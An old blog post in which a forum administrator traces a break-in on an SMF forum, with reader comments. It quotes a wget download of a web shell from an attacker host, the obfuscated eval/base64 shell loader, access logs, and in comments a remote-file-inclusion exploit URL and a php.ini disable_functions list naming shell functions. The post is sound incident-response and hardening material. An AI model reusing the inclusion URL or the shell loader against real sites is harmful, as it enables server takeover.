All Your SMF Forums Have Been Hacked. Have a Nice Day.

There is nothing quite like innocently checking over your httpd logs, attempting to figure out why the ‘preview’ feature of your forum s/w has stopped working [stuck on 'fetching preview...'], only to come up to this…

--09:57:23--  http://kotzilla.jino-net.ru/include.txt
           => `include.txt'
Resolving kotzilla.jino-net.ru... 217.107.217.29
Connecting to kotzilla.jino-net.ru|217.107.217.29|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44,348 (43K) [text/plain]

    0K .......... .......... .......... .......... ...       100%   69.60 KB/s

09:57:25 (69.60 KB/s) - `include.txt' saved [44348/44348]

For those that do not know, the above translates to using wget, or the equivalent, to download a script to your system. With all this being done via Apache and usually from a simple URL designed to exploit a weakness in the given application.

My journey starts here.

Step 1.

find / -name include.txt

Nothing. Intruder must have deleted or renamed it.

Step 2.
Check http://kotzilla.jino-net.ru/include.txt for clues.

<?PHP
             //Authentication
$login = ""; //Login
$pass = "";  //Pass
$md5_pass = ""; //If no pass then hash
eval(gzinflate(base64_decode('HJ3HkqN...[removed]...f/79z/8A')));
?>

Intruder must think this is clever. Once you decode and inflate the string, it returns…

eval(gzinflate(base64_decode('[another string to decode and inflate]')));

Step 3.
We do not want to execute any PHP code that is an unknown. The only option left is to write a PHP script to decode/inflate until we get at the center…

<?php
$string = "eval(gzinflate(base64_decode('HJ3HkqN...[removed]...f/79z/8A')));";
$pattern = '/^eval(gzinflate(base64_decode('([^');]*)/';
$count = 0;
while (preg_match($pattern, $string, $matches) )
{
$count++;
$string = gzinflate(base64_decode($matches[1]));
}
echo "Decoded/Inflated:$countn";
echo "$string";
?>

Seems to be some type of a web php shell script called C99madShell.

Step 4.
We need to locate the downloaded script…

find / -name '*.php' | xargs grep 'eval(gzinflate(base64_decode('
/.../forums.devside.net/Themes/readme.php:eval(gzinflate(base64_decode('HJ3Hkq...

Not good!

Hack Shell 1

Hack Shell 2

Step 5.
Check logs.

grep 'readme.php' /.../forums.devside.net/access_log

Intruder was up to something no good.

149.156.204.1 - - [26/Sep/2007:09:57:38 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4374 "-" "Opera/9.21 (Windows NT 5.1; U; ru)"
149.156.204.1 - - [26/Sep/2007:09:58:00 -0400] "POST /Themes/readme.php HTTP/1.1" 200 3501 "http://forums.devside.net/Themes/readme.php" "Opera/9.21 (Windows NT 5.1; U; ru)"
149.156.204.1 - - [27/Sep/2007:13:08:03 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4366 "-" "GoogleBotv2"
149.156.204.1 - - [27/Sep/2007:13:09:24 -0400] "POST /Themes/readme.php HTTP/1.1" 200 4980 "http://forums.devside.net/Themes/readme.php" "GoogleBotv2"
...

Final Analysis.
I’ve search the logs, and I cannot locate anything helpful about the exploit. It does not seem to be an exploit in a URL, maybe POST related, or has something to do with the SMF theme function. I run no mods, and use the default theme, and do not allow users to switch themes.

The latest SMF 1.1.4 changelog does not state anything about fixed exploits.

I know the IP of the intruder [I'm sure just a hijacked system], the user_id on the forum, the mail account used for activation, but not much anything else.

resolveip 149.156.204.1
Host name of 149.156.204.1 is nzs.agh.edu.pl
149.156.204.1 - - [26/Sep/2007:09:52:58 -0400] "GET /index.php?action=activate;u=1992;code=136bd7eb0f HTTP/1.1" 200 3409 "http://www.qcsalabama.com/mail/src/
read_body.php?mailbox=INBOX&passed_id=685&startMessage=1" "Opera/9.21 (Windows NT 5.1; U; ru)"

Checking the forum account, I see this user has also logged in via another IP [and this might be where the exploit starts]…

83.219.135.75 - - [26/Sep/2007:09:48:07 -0400] "GET /index.php?action=register HTTP/1.1" 200 5961 "http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&
q=+%22powered+by+smf+1.1.3%22+site%3Anet&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
...
83.219.135.75 - - [26/Sep/2007:09:57:07 -0400] "POST //index.php?action=login2 HTTP/1.1" 302 851 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:09 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:11 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 1527 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:23 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 307 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
resolveip 83.219.135.75
Host name of 83.219.135.75 is ppp135-75.tis-dialog.ru

I can understand phpBB getting rooted, I can understand WordPress being owned, but this is a first one for SMF.

And for anyone having odd issues with SMF [like getting stuck on 'fetching preview...']…

Smile. All your SMF forums have been hacked. Have a nice day.

Search ‘fetching preview’ on the SMF support forums. This hack/exploit might be going back years.

17 thoughts on “All Your SMF Forums Have Been Hacked. Have a Nice Day.

  1. Here are some steps that I have taken to block these types of attacks…

    Edit php.ini

    allow_url_fopen = Off
    disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
    

    The last 2-4 functions are not specific to these ‘get system shell’ type of attacks, but should be included unless you need them.

  2. And just to clarify some points, the correlation between the ‘fetching preview…’ problem and this hack is low. Just because you are having similar issues does not mean you have been hacked.

  3. I was thinking about using SMF, as I’ve grown weary with phpBB3, but after seeing this, maybe I’ll just go with punBB.

  4. Every software has had security issues. If they haven’t it is just because it hasn’t happened yet.

    Anyway, this particular issue appears to be related to a bug that was fixed in the latest 1.0 and 1.1 releases.

  5. We had the same issue as well.

    The suspicious readme.php file was on the root path of SMF, not the themes folder. So I guess it’s not related to themes.

    We’ve added the php security controls you mentioned and now we wait.

    Thanks for your insights man. ;)

  6. i have something like a year using SMF and the real problem what i find in it is what some mods makes the code crash sometimes, but in origin is a good forum, simple machines team make their best to give us a free solution.

  7. Hey,

    I have red the aricle very, very carefully because I’ thinking of having SMF installed as a forum on one of my accounts. Do you think that it is not safer than any other Open Source freeware forum software?

  8. the C99madShell is a common exploit script used against any system which allows attachments or uploads, make sure that you do not allow uploads with php* extensions to any of your systems or you leave yourself open to this attack which can be used to root your server or to make your server attack other servers

  9. A few things I would like to clear up, The shell is encoded with bace64 to get round mod_security. Now I know this is a OLD blog post, but I think he exploited a remote file inclusion exploit in the themes directory(thats why he opened the readme). The exploit is;

    /Sources/Themes.php?settings[theme_dir]=http://bilmemne.siz/c99.txt?

    Now theres not official patch for this yet, But the exploit should be unable to work if you have register_globles enabled.

  10. Retarded script-kiddies are trying this on old versions of SMF…

    thedomain.com/index.php?action=http_full_url_to_txt_with_php_inside

  11. So what do we do, delete the forums?? IS this serious like getting your info like credit card number, address of your house and stuff?? please let me know sap.

    Thanks

  12. I have just installed the latest update of smf ( version 1.1.5 ) but after reading about this vulnerability I am quite worried :(

    How safer can be the latest version of smf compare to other open source forums softwares? I really like smf & I do think that it is a good and flexible forum especially for ppl like me who dont know programming!

  13. Hi Folks!

    Just wanted to share my new experience.

    If your Windows XP denies to run due to an error corresponding to missing HAL.DLL, invalid Boot.ini or any other important system boot files you can repair this by using the XP installation CD. Simply boot from your XP Setup CD and enter the Recovery Console. Then launch “attrib -H -R -S” on the C:Boot.ini file and delete it. Run “Bootcfg /Rebuild” and then Fixboot

    Regards,
    Carl

Comments are closed.